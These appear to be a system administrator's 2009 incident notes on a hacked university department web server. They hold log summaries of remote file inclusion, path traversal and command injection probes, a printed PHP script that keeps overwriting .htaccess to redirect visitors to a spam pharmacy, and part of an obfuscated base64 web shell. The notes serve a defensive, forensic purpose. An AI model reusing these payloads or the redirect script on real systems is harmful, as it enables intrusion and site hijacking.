/design/hpa/spgm/index.php?spgmGal=Flight_ ... =6&spgmFilters=: 1 Time(s)
/errors.php?error=http://home.covenantberk ... s/kampret.jpg??: 2 Time(s)
/giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... /bajocdm2.txt??: 1 Time(s)
/giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... /upload/ec.txt?: 6 Time(s)
/giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... com/allnet.txt?: 1 Time(s)
/giving//?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 3 Time(s)
/organizations//index.php?go=http://www.to ... ips_w/id.txt???: 1 Time(s)
/organizations/aiaa//index.php?go=http://w ... ips_w/id.txt???: 1 Time(s)
/organizations/aiaa/errors.php?error=http: ... s/kampret.jpg??: 1 Time(s)
/organizations/aiaa/index.php?go=l%20...// ... ips_w/id.txt???: 1 Time(s)
/organizations/aiaa/index.php?go=links: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 2 Time(s)
/organizations/aiaa/lutze/health/best-viagra.html: 1 Time(s)
/organizations/aiaa/lutze/health/buy-cheapest-cialis.html: 1 Time(s)
/organizations/aiaa/lutze/health/buy-ciali ... ofessional.html: 1 Time(s)
/organizations/aiaa/lutze/health/buy-viagra-pills.html: 1 Time(s)
/organizations/aiaa/lutze/health/buying-re ... escription.html: 1 Time(s)
/organizations/aiaa/lutze/health/canadian- ... acy-cialis.html: 1 Time(s)
/organizations/aiaa/lutze/health/canadian- ... agra-legal.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-en-mexico.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-ne ... y-delivery.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-on ... escription.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-professional.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-strenght-mg.html: 1 Time(s)
/organizations/aiaa/lutze/health/cialis-transdermal.html: 1 Time(s)
/organizations/aiaa/lutze/health/how-to-bu ... -in-canada.html: 1 Time(s)
/organizations/aiaa/lutze/health/purchase- ... y-delivery.html: 1 Time(s)
/organizations/aiaa/lutze/health/purchase-cialis.html: 1 Time(s)
/organizations/aiaa/lutze/health/purchasin ... y-delivery.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-brand.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-canada-generic.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-dosage.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-in-spain.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-online-deals.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-pr ... tion-label.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-sales-canada.html: 1 Time(s)
/organizations/aiaa/lutze/health/when-will ... be-generic.html: 1 Time(s)
/organizations/aiaa/lutze/health/where-to- ... agra-cheap.html: 1 Time(s)
/organizations/aiaa/lutze/health/where-to-buy-cialis.html: 1 Time(s)
/organizations/errors.php?error=http://hom ... s/kampret.jpg??: 1 Time(s)
/organizations/vtsgt/gallery/add_comment.p ... lery_popup=true: 3 Time(s)
/research/?area_id=2: 1 Time(s)
/research/?area_id=3: 4 Time(s)
/research/?area_id=6: 1 Time(s)
/research/thesis: 3 Time(s)
/research/thesis/?mode=area_selected&thesis_area=1: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=2: 2 Time(s)
/research/thesis/index.php: 1 Time(s)
/research/thesis?PHPSESSID=6d7a4053baa4341ecb12f59c3e96713e: 1 Time(s)
/research/thesis?PHPSESSID=84e12d3ca0c34b1db03f42dede788a6a: 1 Time(s)
/~amir/: 1 Time(s)
/~balabanv/Meetings/hpccp.wksh.97.ps: 1 Time(s)
/~brown/Papers//source/mod/rss/view.php?Co ... ./../etc/passwd: 1 Time(s)
/~brown/Papers/source/mod/rss/view.php?Cod ... w.rabika.ru/hk?: 1 Time(s)
/~brown/VTShipDesign/VTDesignforAffordabil ... es/editdata.mso: 1 Time(s)
/~brown/VTShipDesign/VTShipDesign_files/editdata.mso: 2 Time(s)
/~brown/VTShipDesign/errors.php?error=http ... s/kampret.jpg??: 1 Time(s)
/~brown/errors.php?error=http://home.coven ... s/kampret.jpg??: 1 Time(s)
/~cdhall/MyMaps/Usage%20&%20FAQ.txt//?file ... ips_w/id.txt???: 1 Time(s)
/~cliff/aoe5244/aoe5244.html: 1 Time(s)
/~cliff/aoe5244/proj_lagr.pdf: 1 Time(s)
/~cliff/aoe5244/quad_eg.m: 1 Time(s)
/~cwoolsey//ee_commerce/paypalcart.php?tor ... pyright.txt????: 1 Time(s)
/~cwoolsey/Advisees//ee_commerce/paypalcar ... pyright.txt????: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate//ee_comm ... pyright.txt????: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... pyright.txt????: 2 Time(s)
/~cwoolsey/Courses/AOE3134/(null): 1 Time(s)
/~devenpor/aoe3054/(null): 1 Time(s)
/~grasmeye/bkmk.html: 1 Time(s)
/~grasmeye/photos/allison/: 1 Time(s)
/~grasmeye/photos/allison/billstory.html: 1 Time(s)
/~grasmeye/photos/hotsprings: 1 Time(s)
/~grasmeye/photos/hotsprings/: 1 Time(s)
/~grasmeye/photos/index.html: 2 Time(s)
/~grasmeye/photos/mexico/: 1 Time(s)
/~hokiesat/subs/wiring//include/admin.lib. ... igen/.../ids???: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff//includ ... igen/.../ids???: 1 Time(s)
/~jing/MohrCircle.html&ei=o40KSpeLG4mqtgeC ... SwUj1hKfdf6I2cQ: 1 Time(s)
/~jkuhn/: 3 Time(s)
/~jkuhn/office2003.tar/: 1 Time(s)
/~lutze/AOE4134/7MissionAnalysis.pdf/?_SER ... /upload/ec.txt?: 1 Time(s)
/~lutze/AOE4134/patchedconiceqs.pdf/?_SERV ... /bajocdm2.txt??: 1 Time(s)
/~lutze/AOE4134/patchedconiceqs.pdf/?_SERV ... /upload/ec.txt?: 6 Time(s)
/~lutze/AOE4134/patchedconiceqs.pdf/?_SERV ... ote_log/ec.txt?: 2 Time(s)
/~mason/Mason_f//source/mod/rss/view.php?C ... ./../etc/passwd: 1 Time(s)
/~mason/Mason_f/source/mod/rss/view.php?Co ... w.rabika.ru/hk?: 1 Time(s)
/~mason/Mason_f/www.avweb.com/news/reviews/182564-1.html: 1 Time(s)
/~simpson/PDFMedia029559/e/0: 1 Time(s)
/~simpson/PDFMedia029559/e/1: 1 Time(s)
/~simpson/aoe4154/(null): 1 Time(s)
/~specs-a: 1 Time(s)
/~teamga/: 1 Time(s)
/~tether-a: 1 Time(s)
/~walters/AOE6145: 1 Time(s)
/~wang/: 1 Time(s)
/~wang/heat: 3 Time(s)
/~wang/robots.txt: 1 Time(s)
405 Method Not Allowed
/~hokiesat/: 1 Time(s)
/~mason/: 12 Time(s)
416 Request Range Not Satisfiable
/~mason/Mason_f/DBF/hpa_compilation.wmv: 1 Time(s)
/~mason/Mason_f/VTechT1Gavial.pdf: 2 Time(s)
Today this was found in research:
[root@bacchus research]# ls -Fla
total 132
drwxrwsr-x 7 apache web-admin 4096 May 4 09:39 ./
drwxrwsr-x 26 apache web-admin 4096 Apr 15 13:21 ../
-rw-r--r-- 1 apache web-admin 378 May 4 09:39 15.php
[root@bacchus research]# cat 15.php
<?
//Error_Reporting(E_ALL & ~E_NOTICE);
$text='redirect / http://top-pharm-shop.com/group.php?group_id=152&said=sssl';
ignore_user_abort(true);
set_time_limit(0);
while(!is_file('ntfs'))
{
$fp = @fopen("/www/sssl-html/simplePHPblog/healthcenter/.htaccess","w");
@flock ($fp, LOCK_EX);
@fputs($fp,$text);
@flock ($fp, LOCK_UN);
@fclose($fp);
sleep(0);
}
?>
No .htaccess file was in healthcenter
195.151.216.49 - admin [04/May/2009:09:35:57 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 55416
131.107.155.228 - - [04/May/2009:09:36:00 -0400] "GET /~cdhall/Space/ HTTP/1.1" 200 72971
195.151.216.49 - admin [04/May/2009:09:36:00 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 41075
195.151.216.49 - admin [04/May/2009:09:36:08 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 16614
61.135.216.104 - - [04/May/2009:09:36:11 -0400] "GET /~cdhall/Space/index.rdf HTTP/1.1" 200 10220
198.82.16.13 - - [04/May/2009:09:36:13 -0400] "GET /~aborgolt/aoe3054/classes/Class%204%20-%20Analog%20Instrumentation%20-%202009-02-09.pdf HTTP/1.1" 200 808664
198.82.16.13 - - [04/May/2009:09:36:13 -0400] "GET /~aborgolt/aoe3054/classes/Class%204%20-%20Analog%20Instrumentation%20-%202009-02-09.pdf HTTP/1.1" 206 748477
195.151.216.49 - admin [04/May/2009:09:36:14 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 17045
66.235.124.59 - - [04/May/2009:09:36:17 -0400] "GET /%7Ekapania/StructuresPrelim/ HTTP/1.0" 200 11835
195.151.216.49 - admin [04/May/2009:09:36:18 -0400] "GET /prospective/sitemap.php HTTP/1.0" 200 22649
204.111.158.56 - - [04/May/2009:09:36:37 -0400] "GET /~aborgolt/aoe3054/classes/Class%206%20-%20Dynamic%20Response%20-%202009-02-23.pdf HTTP/1.1" 200 667923
195.151.216.49 - - [04/May/2009:09:36:38 -0400] "GET /alumni/15.php HTTP/1.0" 200 384
[root@bacchus www]# find /mnt/lacie/bacchus-hacked/ -iname sitemap.php
/mnt/lacie/bacchus-hacked/www/aoe-html/prospective/sitemap.php
/mnt/lacie/bacchus-hacked/www/aoe-html/sitemap.php
/mnt/lacie/bacchus-hacked/www/sssl-html/simplePHPblogOld/sitemap.php
[root@bacchus aoe-html]# ls -Fla /mnt/lacie/bacchus-hacked/www/aoe-html/prospective/
total 244
drwxrwsr-x 2 apache web-admin 4096 May 4 09:52 ./
drwxrwsr-x 26 apache web-admin 4096 Apr 15 13:21 ../
-rw-r--r-- 1 apache web-admin 147623 May 4 09:52 1.zip
-rwxrwxr-x 1 mkapania web-admin 3059 Sep 1 2008 index.php*
-rwxrwxr-x 1 mkapania web-admin 3053 Aug 7 2008 index.php~*
-rw-r--r-- 1 lscharf web-admin 207 Jun 10 2005 sitemap.dat
-rw-r--r-- 1 apache web-admin 44293 Apr 26 16:48 sitemap.php
74.6.17.174 - - [26/Apr/2009:16:00:18 -0400] "GET /pics/weeki2008/Weeki%20Wachi/slides/DSC_0074.html HTTP/1.0" 200 10701
67.195.111.186 - - [26/Apr/2009:16:01:15 -0400] "GET /vids/thumbs/?p=no-1-online-viagra HTTP/1.0" 200 6244
67.195.111.186 - - [26/Apr/2009:16:01:58 -0400] "GET /vids/thumbs/?p=daily-cialis-online HTTP/1.0" 200 6764
74.6.17.174 - - [26/Apr/2009:16:10:45 -0400] "GET /pics/weeki2007/Weeki_Wachee/3_Welcome_to_Weeki_Wachee/slides/IMG_0383.html HTTP/1.0" 200 9329
74.6.17.174 - - [26/Apr/2009:16:11:08 -0400] "GET /pics/weeki2008/Weeki%20Wachi/slides/DSC_0024.html HTTP/1.0" 200 10703
173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /vids/thumbs/?p=cialis-1-a-day HTTP/1.1" 200 6681
173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /vids/thumbs/script.js HTTP/1.1" 404 -
173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /favicon.ico HTTP/1.1" 404 -
74.6.17.174 - - [26/Apr/2009:16:15:36 -0400] "GET /pics/weeki2007/5_The_Event/slides/100_0266.html HTTP/1.0" 200 9116
74.6.17.174 - - [26/Apr/2009:16:15:36 -0400] "GET /pics/weeki2007/res/styles.css HTTP/1.0" 304 -
65.55.208.216 - - [26/Apr/2009:16:16:34 -0400] "GET /html/pics4.html HTTP/1.1" 200 3234
74.6.17.174 - - [26/Apr/2009:16:16:35 -0400] "GET /pics/weeki2007/8_Underwater_2/slides/FH000029.html HTTP/1.0" 200 8766
67.195.111.186 - - [26/Apr/2009:16:16:39 -0400] "GET /vids/thumbs/?p=cheap-soft-cialis HTTP/1.0" 200 6898
95.52.81.134 - - [26/Apr/2009:16:18:38 -0400] "GET /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 6688
74.6.17.174 - - [26/Apr/2009:16:19:17 -0400] "GET /np/2108.html HTTP/1.0" 304 -
95.52.81.134 - - [26/Apr/2009:16:19:23 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 5975
95.52.81.134 - - [26/Apr/2009:16:19:28 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 4203
95.52.81.134 - - [26/Apr/2009:16:19:30 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 6014
95.52.81.134 - - [26/Apr/2009:16:19:34 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 8628
95.52.81.134 - - [26/Apr/2009:16:19:37 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 3744
95.52.81.134 - - [26/Apr/2009:16:19:38 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 29237
95.52.81.134 - - [26/Apr/2009:16:19:52 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 3288
95.52.81.134 - - [26/Apr/2009:16:19:59 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 29237
...
<?PHP
$login = "admin";
$pass = "admin";
$md5_pass = "";
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs//cfWUXldLpKsQ2LCH7EcnuYdrqeqDHEDz+4uJYWH3YLflGUnDJ40DjU/AL1miwEJPpBWlsAxTrgB46jRW/00XpggW00yDI/H1kD7UqxI/3qjQZ4vz7HLsfNVW1BeQKiVH2VTrXtoiaKYdkT4o/p1E8W/n5eVhagV7GanBn0U7OCfD7zPbCQyO0N/QGtstthqJBia5QJsR6xCgkHpBo1kQMlLt6u++SBvtw5KSMwtG4R2yctd0mBNrlB3QQo4aQKGRgRjTa0xYFw1vVM9ySOMd44sSrPeSG8JPyOyEpK+U0y8d4n2EzI9MDdnlMkLKQQ8ZIYPW3sF4lUFF9gO8AjT5ceta4HM7HkZi7S2yoAAPLD8D7Pn4kD6t1EIkHYORMtJBdqcseuvOO5HcoLJO4b5UENDkOEq25EeU3GFSPIGFBzJVwCzJ and on and on...
copied to sitemap.b64
cp -a sitemap.php sitemap.b64
remove all except the base64 data with
vim -b sitemap.b64 openssl enc -d -base64 -a -A -in sitemap.b64 -out sitemap.gz
??? now what???
[root@bacchus functions]# pwd /mnt/lacie/bacchus-mar12009/www/aoe-html/calendars/phpical/functions [root@bacchus functions]# ls -Fla total 228 drwxrwsr-x 2 apache web-admin 4096 Jul 14 2003 ./ drwxrwsr-x 8 apache web-admin 4096 Jul 14 2003 ../ -rw-r--r-- 1 root web-admin 1515 Jul 14 2003 date_add.php -rw-r--r-- 1 root web-admin 5417 Jul 14 2003 date_functions.php -rw-r--r-- 1 root web-admin 1640 Jul 14 2003 draw_functions.php -rw-r--r-- 1 root web-admin 2652 Jul 14 2003 error.php -rw-rw-r-- 1 apache web-admin 451 Oct 2 2002 event.js -rw-r--r-- 1 root web-admin 27467 Jul 14 2003 ical_parser.php -rw-r--r-- 1 root web-admin 3554 Jul 14 2003 init.inc.php -rw-r--r-- 1 root web-admin 1954 Jul 14 2003 list_icals.php -rw-r--r-- 1 apache web-admin 44333 Jul 14 2003 list_inc.php -rw-r--r-- 1 root web-admin 817 Jul 14 2003 list_months.php -rw-r--r-- 1 root web-admin 1248 Jul 14 2003 list_weeks.php -rw-r--r-- 1 root web-admin 1129 Jul 14 2003 list_years.php -rw-r--r-- 1 root web-admin 9903 Jul 14 2003 overlapping_events.php -rw-r--r-- 1 root web-admin 26810 Jul 14 2003 timezones.php
www2 was created around this date
drwxr-xr-x 2 root root 4096 Oct 17 2008 www/
and event.js and list_inc.php files exist. They were likely deleted on this date:
drwxrwsr-x 2 apache web-admin 4096 Apr 26 16:30 functions/
May 14, 2009 Log Analysis
May 14th Log Analysis (Bacchus) =============================== //?page=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 A failed attempt to read the passwd file, just redirected to home page /index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP Response 200 Another failed attempt, just went to the home page null HTTP Response 200 This is generated by IE 7 requesting an unavailable resource. Does no damage (and doesnt happen in Firefox) //include/print_category.php?setup[use_cat ... ve.com/id.txt??: 2 Time(s) Checking on this one right now, will come back to it later. /alumni/alumnilist.php?class=http://193.12 ... 666/index.html?: 2 Time(s) Need to add an input verification script on this file. It will guarantee this access fails. /computing/faq/displayfaq.php?area_id=http ... 666/index.html?: 3 Time(s) Coming from Amsterdam, probably need an input verifier on this page as well. /hall.php?page=http://darkn3st.fileave.com/fx29id.txt?: 1 Time(s) /hall.php?page=http://www.ladyboss.com.ua/fx29id2.txt???: 2 Time(s) No file called hall.php, there is a randolph_hall.php but it looks secure, takes no parameters /photo_comment.php?toroot=http://www.reeft ... a/index/bo.do??: 2 Time(s) I can't find a file called photo_comment.php, but if it exists it should probably have an input verifier on it. /~cdhall/courses/AUAE/styles_sniffer.js: 1 Time(s) Can't find the file...not sure about this one. http://88.80.7.248/pp/anp.php?a=UV%5CHWQBY ... U&b=1155&c=b870: 1 Time(s) Traces to a site in sweden called fast-medications.net...
May 16, 2009 Log Analysis
404's
//ee_commerce/paypalcart.php?toroot=http:/ ... MADONGCMD.txt??: 3 Time(s)
//include/admin.lib.inc.php?site_path=http ... s/93/yes.txt???: 1 Time(s)
//include/print_category.php?setup[use_cat ... wap.sh/id.txt??: 2 Time(s)
//photo_comment.php?toroot=http://www.trit ... m/2009/id.txt??: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 3 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s)
/Papers/ASNE2002Paper.pdf: 1 Time(s)
/Space/archives/000786.html: 4 Time(s)
/_vti_bin/_vti_aut/author.dll: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 3 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 4 Time(s)
/_vti_inf.html: 4 Time(s)
/awstats.pl?configdir=%7Cecho%20;echo%20;i ... o%20;echo%20%7C: 1 Time(s)
/cgi-bin/MachineInfo/cgi-bin/wrap/gurdal/: 1 Time(s)
/cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C: 1 Time(s)
/cgi-bin/awstats.pl?configdir=%7Cecho%20;e ... o%20;echo%20%7C: 1 Time(s)
/cgi-bin/index.cgi?page=%7Cuname%20-a;id%7C: 1 Time(s)
/cgi-bin/kerbynet?Section=NoAuthREQ&Action ... ype=*%22;id;%22: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=449: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1134: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s)
/cgi-bin/news.cgi?id=%7Cid%7C: 1 Time(s)
/cgi-bin/quikstore.cgi?category=%7Cid%7C: 1 Time(s)
/cgi-bin/shop.pl/page=%7Cid%7C: 1 Time(s)
/cgi-sys/guestbook.cgi?user=cpanel&template=%7Cid%7C: 1 Time(s)
/computing/faq/displayfaq.php?area_id=5: 1 Time(s)
/main.cgi/file.txt?down_num=953713356&boar ... ile.txt%7Cid%7C: 1 Time(s)
/organizations/aiaa/gallery/gallery1/0708officers.JPG: 1 Time(s)
/organizations/aiaa/gallery/gallery1/officer2008.jpg: 1 Time(s)
/organizations/aiaa/gallery/gallery2/01-0412080919.jpg: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=3&pic=2: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=4&pic=1: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=4&pic=10: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=4&pic=11: 1 Time(s)
/organizations/aiaa/index.php?go=calendar: 1 Time(s)
/organizations/aiaa/index.php?go=contacts: 2 Time(s)
/organizations/aiaa/index.php?go=links: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 2 Time(s)
/organizations/index.php?inc=http://indoir ... o/idscan.txt???: 1 Time(s)
/organizations/vtsgt/gallery/add_comment.p ... lery_popup=true: 1 Time(s)
/organizations/vtsgt/index.php?inc=http:// ... o/idscan.txt???: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=1: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=2: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=4: 2 Time(s)
/saffairs/pages/r/?Trans-union-free-credit-report-1/: 1 Time(s)
/search.php: 14 Time(s)
/services/help/?show=about&module=;%22.passthru(%22id%22);: 1 Time(s)
/shop.pl/page=%7Cid%7C: 1 Time(s)
/skin_shop/standard/3_plugin_twindow/twind ... /scripts/test??: 1 Time(s)
/technote/main.cgi/file.txt?down_num=95371 ... ile.txt%7Cid%7C: 1 Time(s)
/twiki/bin/configure?action=image;image=%7Cid%7C;type=text: 1 Time(s)
/undergraduate: 1 Time(s)
/~cwoolsey//photo_comment.php?toroot=http: ... m/2009/id.txt??: 1 Time(s)
/~cwoolsey/Advisees//photo_comment.php?tor ... m/2009/id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate//ee_comm ... MADONGCMD.txt??: 3 Time(s)
/~cwoolsey/Advisees/Undergraduate//photo_c ... m/2009/id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... MADONGCMD.txt??: 3 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... m/2009/id.txt??: 1 Time(s)
/~hokiesat/subs/wiring//include/admin.lib. ... s/93/yes.txt???: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff//includ ... s/93/yes.txt???: 1 Time(s)
/~lscharf/scripts/homepages.php.txt%20%20/ ... br/fx29id.txt??: 1 Time(s)
/~lscharf/scripts/homepages.php.txt%20%20/ ... t/fx29id1.txt??: 1 Time(s)
/~mason//include/print_category.php?setup[ ... wap.sh/id.txt??: 2 Time(s)
/~mason//photo_comment.php?toroot=http://w ... m/2009/id.txt??: 1 Time(s)
/~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s)
/~mason/Mason_f//ee_commerce/paypalcart.ph ... MADONGCMD.txt??: 1 Time(s)
/~mason/Mason_f//include/print_category.ph ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f//photo_comment.php?toroot= ... m/2009/id.txt??: 1 Time(s)
/~mason/Mason_f/747CONF.INP//include/print ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/M96SAE.pdf//include/print_ ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/MorphFinalRptF03.pdf%20%20 ... m/2009/id.txt??: 1 Time(s)
/~mason/Mason_f/MorphFinalRptF03.pdf//ee_c ... MADONGCMD.txt??: 1 Time(s)
/~mason/Mason_f/favicon.ico: 4 Time(s)
/~mason/Mason_f/skin_shop/standard/3_plugi ... /scripts/test??: 1 Time(s)
http://www.aoe.vt.edu/~devenpor/aoe5104/2% ... 2520Algebra.pdf: 1 Time(s)
405 Method Not Allowed
/~cdhall/: 1 Time(s)
/~hokiesat/: 6 Time(s)
/~mason/: 3 Time(s)
May 17, 2009 Log Analysis
A total of 2 sites probed the server
132.205.95.71 174.35.250.57
404's
//assets/snippets/reflect/snippet.reflect. ... /scripts/test??: 1 Time(s)
//components/com_extcalendar/errors.php?er ... s/kampret.jpg??: 1 Time(s)
//include/print_category.php?setup[use_cat ... wap.sh/id.txt??: 2 Time(s)
//skin/zero_vote/setup.php?%20dir=http://d ... wap.sh/id.txt??: 3 Time(s)
/3DLDV/wb23000/data.html: 1 Time(s)
/alumni/alumnilist.php?class=http://owned- ... luelinebe.html?: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/computing/faq/displayfaq.php?area_id=3: 2 Time(s)
/computing/faq/displayfaq.php?area_id=4: 1 Time(s)
/organizations/aiaa/show_news.php?cutepath ... og/fx29id.txt??: 1 Time(s)
/organizations/show_news.php?cutepath=http ... og/fx29id.txt??: 1 Time(s)
/show_news.php?cutepath=http://212.227.74. ... og/fx29id.txt??: 1 Time(s)
/~mason//include/print_category.php?setup[ ... wap.sh/id.txt??: 2 Time(s)
/~mason//skin/zero_vote/setup.php?%20dir=h ... wap.sh/id.txt??: 3 Time(s)
/~mason/Mason/ACiX29.htmlects/s37/index.ht ... tml\x9f\xfe\xff: 1 Time(s)
/~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s)
/~mason/Mason_f//assets/snippets/reflect/s ... /scripts/test??: 1 Time(s)
/~mason/Mason_f//include/print_category.ph ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f//skin/zero_vote/setup.php? ... wap.sh/id.txt??: 3 Time(s)
/~mason/Mason_f/747CONF.INP//include/print ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/747CONF.INP//skin/zero_vot ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/M96SAE.pdf//include/print_ ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/M96SAE.pdf//skin/zero_vote ... wap.sh/id.txt??: 3 Time(s)
May 18, 2009 Log Analysis
A total of 8 sites probed the server
189.8.13.18 208.94.173.99 217.218.82.15 58.214.162.140 79.233.147.7 80.191.127.196 82.19.44.18 94.169.92.137
403's
/research/: 13 Time(s)
/research/?area_id=1: 2 Time(s)
/research/?area_id=2: 3 Time(s)
/research/?area_id=3: 1 Time(s)
/research/?area_id=4: 1 Time(s)
/research/?area_id=5: 1 Time(s)
/research/?area_id=6: 1 Time(s)
404's
/%7Eciochett/lit/zen.html: 1 Time(s)
/%7Emason/Mason_f/errors.php?error=http:// ... hu/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/viewitem. ... hu/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/viewitem. ... oc/self/environ: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/viewitem. ... self/environ%00: 1 Time(s)
/%7Emason/errors.php?error=http://www.fmf2 ... hu/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/viewitem.php?Code ... hu/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/viewitem.php?Code ... oc/self/environ: 1 Time(s)
/%7Emason/source/mod/rss/viewitem.php?Code ... self/environ%00: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s)
/\xef\xbd\x9emason/Mason_f/icase_paper95.pdf: 1 Time(s)
/alumni/news.php?gashar=GASHAR&back_eval=p ... =SBD_MAKE_VOICE: 1 Time(s)
/cart.php?category_id=': 2 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/display.php?pg=http://www.5d-gaming.org/b/iid.txt??: 1 Time(s)
/errors.php?error=http://www.fmf2004.hu/buggsbunny??: 1 Time(s)
/ferror.txt: 1 Time(s)
/forum/index.php: 1 Time(s)
/forums/index.php: 1 Time(s)
/news.php?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 2 Time(s)
/organizations/aiaa/index.php?go=../../../ ... ./../etc/passwd: 1 Time(s)
/organizations/aiaa/index.php?go=../../../ ... ./etc/passwd%00: 2 Time(s)
/organizations/aiaa/index.php?go=contacts: 2 Time(s)
/organizations/aiaa/index.php?go=links: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 1 Time(s)
/organizations/aiaa/index.php?start_from=2 ... subaction=&id=&: 1 Time(s)
/organizations/sname/ingalls02pics/plas%25 ... 2520cutting.jpg: 2 Time(s)
/organizations/sname/ingalls02pics/plate%2 ... las%2520arc.jpg: 2 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=408: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=409: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=413: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=414: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=419: 1 Time(s)
